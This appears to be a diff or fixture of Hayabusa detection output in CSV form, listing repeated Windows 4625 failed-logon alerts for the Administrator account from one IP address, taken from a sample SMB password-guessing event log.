+2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
